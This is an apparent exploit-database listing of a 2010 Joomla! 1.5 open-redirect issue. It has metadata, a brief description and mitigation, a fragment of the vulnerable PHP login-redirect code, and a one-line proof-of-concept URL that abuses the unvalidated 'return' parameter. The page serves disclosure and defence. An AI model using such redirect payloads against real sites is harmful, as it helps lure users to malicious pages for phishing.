header-logo
Suggest Exploit
vendor:
Joomla!
by:
Mr.MLL
7,5
CVSS
HIGH
Multiple
20
CWE
Product Name: Joomla!
Affected Version From: Joomla! 1.5
Affected Version To: All versions down
Patch Exists: Yes
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla! (Multiple) ExploiT

A vulnerability exists in Joomla! 1.5 and all versions down, which allows an attacker to redirect users to a malicious website. This is due to the lack of proper validation of the 'return' parameter in the 'index.php' script. An attacker can exploit this vulnerability by crafting a malicious URL and enticing an unsuspecting user to click on it.

Mitigation:

Ensure that the 'return' parameter is properly validated before using it.
Source

Exploit-DB raw data:

============================================
Joomla!   (Multiple) ExploiT

============================================

#  Powered  Joomla! 1.5 & All version Down  (Multiple)
 
 
# Author: Mr.MLL
# Published: 2010-08-24
# Verified: yes
# Download Exploit Code
# Download N/A
 
===
 
 
# Software :  http://www.joomla.org/download.html
# Vendor   :  http://www.joomla.org/
# Contact  :  Y-3@hotmail.com
 
===


<?php
    }

    if ( $return && !( strpos( $return, 'com_registration' ) || strpos( $return, 'com_login' ) ) ) {
    // checks for the presence of a return url
    // and ensures that this url is not the registration or login pages
        // If a sessioncookie exists, redirect to the given page. Otherwise, take an extra round for a cookiecheck
        if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            mosRedirect( $return );
        } else {
            mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $return ) );
        }
    } else {
        // If a sessioncookie exists, redirect to the start page. Otherwise, take an extra round for a cookiecheck
        if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            mosRedirect( $mosConfig_live_site .'/index.php' );
        } else {
            mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $mosConfig_live_site .'/index.php' ) );
        }
    }

} else if ($option == 'logout') {
    $mainframe->logout();

    // JS Popup message
    if ( $message ) {
        ?>

=========
# ExploiT
 
    http://127.0.0.1/path/index.php?option=cookiecheck&return=http://Google.com/
 
 
=========

# Thanks : milw0rm.com & exploit-db.com  & offsec.com & inj3ct0r.com & www.hack0wn.com

exit ,, / Praise be to God for the blessing of Islam

Navigation

Suggest Exploit

Services By CQR